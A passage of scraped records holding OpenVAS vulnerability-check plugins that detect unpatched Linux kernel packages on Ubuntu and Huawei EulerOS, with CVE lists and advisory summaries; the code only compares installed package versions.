script_tag(name:\"insight\", value:\"USN-3617-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.10. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu\n 16.04 LTS. It was discovered that a race condition leading to a use-after-free\n vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A local\n attacker could use this to cause a denial of service (system crash) or possibly\n execute arbitrary code. (CVE-2017-0861) It was discovered that the KVM\n implementation in the Linux kernel allowed passthrough of the diagnostic I/O\n port 0x80. An attacker in a guest VM could use this to cause a denial of service\n (system crash) in the host OS. (CVE-2017-1000407) It was discovered that a\n use-after-free vulnerability existed in the network namespaces implementation in\n the Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-15129) Andrey\n Konovalov discovered that the usbtest device driver in the Linux kernel did not\n properly validate endpoint metadata. A physically proximate attacker could use\n this to cause a denial of service (system crash). (CVE-2017-16532) Andrey\n Konovalov discovered that the SoundGraph iMON USB driver in the Linux kernel did\n not properly validate device metadata. A physically proximate attacker could use\n this to cause a denial of service (system crash). (CVE-2017-16537) Andrey\n Konovalov discovered that the IMS Passenger Control Unit USB driver in the Linux\n kernel did not properly validate device descriptors. A physically proximate\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16645) Andrey Konovalov discovered that the DiBcom DiB0700 USB DVB\n driver in the Linux kernel did not properly handle detach events. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16646) Andrey Konovalov discovered that the ASIX Ethernet USB driver\n in the Linux kernel did not properly handle suspend and resume events. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16647) Andrey Konovalov discovered that the CDC USB\n Ethernet driver did not properly validate device descriptors. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16649) Andrey Konovalov discovered that the QMI WWAN USB driver did\n not properly validate device descriptors. A physically proximate attacker could\n use this to cause a denial of service (system crash). (CVE-2017-16650) It was\n discovered that the HugeTLB c ... Description truncated, for more information\n please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux-gcp on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3617-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3617-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1012-gcp\", ver:\"4.13.0-1012.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1022-oem\", ver:\"4.13.0-1022.24\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic\", ver:\"4.13.0-38.43~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic-lpae\", ver:\"4.13.0-38.43~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-lowlatency\", ver:\"4.13.0-38.43~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.13.0.1012.14\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.13.0.38.57\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.13.0.38.57\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.13.0.1012.14\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.13.0.38.57\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.13.0.1022.26\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-04-04T00:00:00", "id": "OPENVAS:1361412562310843493", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843493", "type": "openvas", "title": "Ubuntu Update for linux USN-3617-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3617_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3617-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843493\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-04 08:32:15 +0200 (Wed, 04 Apr 2018)\");\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\",\n \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\",\n \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\",\n \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\",\n \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3617-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n leading to a use-after-free vulnerability existed in the ALSA PCM subsystem of\n the Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-0861) It was\n discovered that the KVM implementation in the Linux kernel allowed passthrough\n of the diagnostic I/O port 0x80. An attacker in a guest VM could use this to\n cause a denial of service (system crash) in the host OS. (CVE-2017-1000407) It\n was discovered that a use-after-free vulnerability existed in the network\n namespaces implementation in the Linux kernel. A local attacker could use this\n to cause a denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-15129) Andrey Konovalov discovered that the usbtest device driver in\n the Linux kernel did not properly validate endpoint metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16532) Andrey Konovalov discovered that the SoundGraph iMON USB driver\n in the Linux kernel did not properly validate device metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16537) Andrey Konovalov discovered that the IMS Passenger Control Unit\n USB driver in the Linux kernel did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16645) Andrey Konovalov discovered that the DiBcom\n DiB0700 USB DVB driver in the Linux kernel did not properly handle detach\n events. A physically proximate attacker could use this to cause a denial of\n service (system crash). (CVE-2017-16646) Andrey Konovalov discovered that the\n ASIX Ethernet USB driver in the Linux kernel did not properly handle suspend and\n resume events. A physically proximate attacker could use this to cause a denial\n of service (system crash). (CVE-2017-16647) Andrey Konovalov discovered that the\n CDC USB Ethernet driver did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16649) Andrey Konovalov discovered that the QMI WWAN\n USB driver did not properly validate device descriptors. A physically proximate\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16650) It was discovered that the HugeTLB component of the Linux\n kernel did not properly handle holes in hugetlb ranges. A local attacker could\n use this to expose sensitive information (kernel memory). (CVE-2017-16994) It\n was discovered that the netfilter ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3617-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3617-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic\", ver:\"4.13.0-38.43\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-generic-lpae\", ver:\"4.13.0-38.43\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-38-lowlatency\", ver:\"4.13.0-38.43\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.13.0.38.41\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.13.0.38.41\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.13.0.38.41\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:39:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16525", "CVE-2017-15299", "CVE-2017-1000380", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16531", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-16644", "CVE-2017-16530", "CVE-2017-16645"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171291", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1291)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1291\");\n script_version(\"2020-01-23T14:09:13+0000\");\n script_cve_id(\"CVE-2017-1000380\", \"CVE-2017-15299\", \"CVE-2017-16525\", \"CVE-2017-16526\", \"CVE-2017-16529\", \"CVE-2017-16530\", \"CVE-2017-16531\", \"CVE-2017-16532\", \"CVE-2017-16533\", \"CVE-2017-16534\", \"CVE-2017-16535\", \"CVE-2017-16536\", \"CVE-2017-16537\", \"CVE-2017-16538\", \"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16645\", \"CVE-2017-16649\", \"CVE-2017-16650\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 14:09:13 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:05:47 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1291)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1291\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1291\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1291 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability was found in the key management subsystem of the Linux kernel. An update on an uninstantiated key could cause a kernel panic, leading to denial of service (DoS).(CVE-2017-15299)\n\nThe usb_serial_console_disconnect function in drivers/usb/serial/console.c in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via a crafted USB device, related to disconnection and failed setup.(CVE-2017-16525)\n\ndrivers/uwb/uwbd.c in the Linux kernel before 4.13.6 allows local users to cause a denial of service (general protection fault and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16526)\n\ndrivers/usb/core/config.c in the Linux kernel before 4.13.6 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.(CVE-2017-16531)\n\nThe get_endpoints function in drivers/usb/misc/usbtest.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16532)\n\nThe usbhid_parse function in drivers/hid/usbhid/hid-core.c in the Linux kernel before 4.13.8 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16533)\n\nThe uas driver in the Linux kernel before 4.13.6 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to drivers/usb/storage/uas-detect.h and drivers/usb/storage/uas.c.(CVE-2017-16530)\n\nThe usb_get_bos_descriptor function in drivers/usb/core/config.c in the Linux kernel before 4.13.10 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16535)\n\nA flaw was found that sound/core/timer.c in the Linux kernel before 4.11.5 is vulnerable to a data race in the ALSA /dev/snd/timer driver resulting in local users being able to read information belonging to other users. Uninitialized memory contents may be disclosed when a read and an ioctl happen at the same time.(CVE-2017-1000380)\n\nThe imon_probe function in drivers/media/rc/imon.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.49.1.155\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:35:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18079", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-17448", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-18208", "CVE-2017-16939", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-17807", "CVE-2017-16644", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191501", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1501)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1501\");\n script_version(\"2020-01-23T11:57:49+0000\");\n script_cve_id(\"CVE-2017-16533\", \"CVE-2017-16534\", \"CVE-2017-16535\", \"CVE-2017-16536\", \"CVE-2017-16537\", \"CVE-2017-16538\", \"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16645\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16939\", \"CVE-2017-17448\", \"CVE-2017-17449\", \"CVE-2017-17450\", \"CVE-2017-17558\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18079\", \"CVE-2017-18203\", \"CVE-2017-18208\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:57:49 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:57:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1501)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1501\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1501\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1501 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The usbhid_parse function in drivers/hid/usbhid/hid-core.c in the Linux kernel, before 4.13.8, allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16533)\n\nThe cdc_parse_cdc_header() function in 'drivers/usb/core/message.c' in the Linux kernel, before 4.13.6, allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2017-16534)\n\nThe usb_get_bos_descriptor function in drivers/usb/core/config.c in the Linux kernel can allow a local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16535)\n\nThe cx231xx_usb_probe function in drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16536)\n\nThe imon_probe function in drivers/media/rc/imon.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16537)\n\nThe drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux kernel, through 4.13.11, allows local users to cause a denial of service (general protection fault and system crash) or possibly have unspecified other impact via a crafted USB device, related to a missing warm-start check and incorrect attach timing (dm04_lme2510_frontend_attach versus dm04_lme2510_tuner).(CVE-2017-16538)\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16643)\n\nThe hdpvr_probe function in drivers/media/usb/hdpvr/hdpvr-core.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (improper error handling and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16644)\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel, through 4.13.11, allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system cra ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2018-9363", "CVE-2016-9588", "CVE-2018-16658", "CVE-2017-13168"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-11-15T00:00:00", "id": "OPENVAS:1361412562310843824", 